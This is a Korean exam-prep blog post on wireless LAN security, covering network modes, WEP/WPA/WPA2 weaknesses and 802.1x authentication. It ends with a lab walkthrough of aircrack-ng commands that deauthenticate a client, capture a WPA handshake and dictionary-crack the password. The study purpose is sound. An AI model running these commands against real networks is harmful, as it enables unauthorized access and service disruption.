Always-Try(정보보안 및 일상)

[정보보안기사][실기] 무선랜 보안(Wireless LAN) 본문

정보보안 자격증 + ISMS-P

[정보보안기사][실기] 무선랜 보안(Wireless LAN)

Always-Try 2021. 9. 27. 23:06

무선랜 구성 방식

 

더보기

1. Infrastructure 모드

  • 각각의 단말기가 무선 AP를 통해 통신하고 단말기 서로 간에는 직접 통신을 하지 않는 방식

2. Ad-hoc 모드

  • 각각의 단말기 간에 통신을 통해 무선 도달 범위를 넓히는 방식. AP를 사용하지 않음

 



SSID, BSS, BSSID, ESS, ESSID, DS, 비콘 프레임/메시지

 

더보기

1. SSID

  • 무선랜 식별자

2. BSS

  • 무선랜의 가장 기본적인 망 구성 단위(AP와 단말기)

3. BSSID

  • BSS 식별자 (보통 무선 AP의 MAC 주소를 사용)

4. ESS

  • 여러 BSS에 의해 구성된 네트워크

5. ESSID

  • ESS 식별자

6. DS (Distribution System)

  • 무선 AP가 연결 된 유선 네트워크

7. 비콘 프레임/메시지

  • 무선 AP가 자신이 관리하는 무선랜(BSS)의 존재를 브로드캐스트 하는 메시지

 

 


무선랜 보안 기술 

 

더보기

1. 접속 인증 기술

  • SSID 숨김 설정
  • MAC 주소 필터링
  • 공유키 인증 (PSK:Pre-Shared Key)
  • IEEE 802.1x/EAP(인증서버, RADIUS 이용)

2. 데이터 암호 기술

  • WEP
  • WPA, WPA2

 

 

 

WEP, WPA, WPA2

 

더보기

1. WEP

  • 개요
    • IV(24bit)와 고정된 공유키(40bit or 104bit)를 조합하여 암호키를 생성한 후 RC4 알고리즘을 기반으로 PRNG(수도 난수 발생기)에 입력하여 키스트림 생성
    • 유선랜과 동등한 수준의 보안성 제공을 위해 탄생함
  • 문제점
    • IV와 공유키가 짧다. IV를 무작위로 생성하기 하지만 24bit라서 동일한 IV가 사용될 가능성이 있음
    • 단방향 인증방식 제공으로 인한 취약성이 존재
    • 고정된 공유키를 사용하여 1명이 털리면 다 털림

 

2. WPA

  • 개요
    • WEP의 문제점을 보완함
      • IV의 크기를 24bit에서 48bit로 늘리고, RC4-TKIP 사용함
    • 문제점
      • 여전히 취약한 RC4 암호 알고리즘 사용
      • TKIP 적용은 S/W 업그레이드를 이용하고 있기 때문에 S/W 처리에 따른 성능 지연 발생

 

3. WPA2

  • 개요
    • AES-CCMP 암호방식 사용
      • CCMP는 Counter모드 기반의 CBC-MAC을 결합한 CCM을 기반으로 함
  • WPA/WPA2의 인증방식
    • PSK
      • Pre Shared Key 즉, 미리 만든 패스워드를 공유하는 방식
      • 패스워드를 짧게 설명하면 사전 공격(Dictionary Attack)을 통해 크래킹 당할 수 있음
    • IEEE 802.1x/EAP
      • EAP는 인증을 하는 프로토콜은 아니지만, 다양한 종류의 인증 방법을 전송하는 역할을 수행함
      • Radius와 같은 인증 서버와 연동하여 인증 절차를 진행하는 방식임

 

 


WPA-PSK 인증 패스워드 크래킹 실습

 

더보기

1. 도구

  • aircrack-ng: 무선랜 모니터링, 크래킹, 분석 도구. 아래 프로그램들이 포함되어 있음
    • airmon-ng: 무선랜 인터페이스를 모니터 모드로 전환하는 프로그램
    • airodump-ng: 무선 패킷 덤프 뜨는 프로그램
    • airreplay-ng: 무선 네티워크에 패킷을 재생성하는 프로그램
    • airdecap-ng: 암호화된 패킷 덤프를 복호화 해주는 프로그램

 

2. 절차

  • 무선랜 인터페이스 모니터 모드 활성화
    • #iwconfig (무선랜 인터페이스 상태 확인)
    • #airmon-ng start wlan0 (wlan0 인터페이스를 모니터 모드로 전환. 유선랜의 무차별모드(promiscuous와 같음)
  • 무선랜 네트워크 덤프
    • #airodump-ng wlan0mon
    • #airodump-ng --bssid 00:08:9F~~~ -c 5 -w wpa wlan0mon
      • -c 5: 대상 무선 AP의 채널
      • -w wpa: 패킷 덤프파일의 접두어
      • wlan0mon 패킷을 수집할 모니터 모드의 무선랜 인터페이스(모니터 모드 전환 시 인터페이스명이 변경됨)
  • 무선 AP와 단말 간 재인증이 발생하도록 공격
    • #airreplay-ng --deauth 100 -a 00:09:9F~~~ -c AC:EE:9E~~ wlan0mon 
      • --deauth 100: 인증해제 패킷 전송 횟수 (인증 해제 시, 자동으로 다시 재인증을 시도하므로 전송)
      • -a: 대상 무선 AP의 BSSID
      • -c: 대상 단말의 MAC 주소 
  • 수집한 덤프 파일로 패스워드 크랙 수행
    • #aircrack-ng -w ./DIC/pw.list wpa-01.cap
  • 크랙한 패스워드를 이용한 무선전송 데이터 복호화
    • airdecap-ng -p password -e TEST_AP wpa-01.cap

 

 

 

Comments